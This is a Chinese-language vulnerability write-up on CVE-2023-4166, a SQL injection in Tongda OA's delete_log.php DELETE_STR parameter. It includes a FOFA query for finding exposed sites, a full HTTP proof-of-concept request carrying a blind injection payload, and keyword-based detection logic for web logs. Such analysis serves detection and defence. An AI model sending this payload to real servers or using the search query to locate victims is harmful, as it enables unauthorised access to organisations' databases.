SQL注入-通达OA SQL注入漏洞【CVE-2023-4166】原理及检测思路分析

1、漏洞描述

 通达OA中发现一个漏洞，并被列为严重漏洞。该漏洞影响文件general/system/seal_manage/dianju/delete_log.php的未知代码。对参数 DELETE_STR 的操作会导致 sql 注入。

2、影响范围

  通达OA版本11.10之前

3、复现环境

 FOFA搜索：app="TDXK-通达OA" && icon_hash="-759108386"，发现漏洞网站

4、POC

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1) and (substr(DATABASE(),2,1))=char(68) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4n867pmrrp4nendg0tsngl7g70; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c74d7ebb
Connection: close

5、检测思路

 -数据源：Web访问流量日志

 -检测逻辑：

  -and:

    -uri 包含 ‘/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=’

    -uri 包含 'from'

    -or:

        -uri 包含 'select'

        -uri 包含 'delete'

        -uri 包含 'update'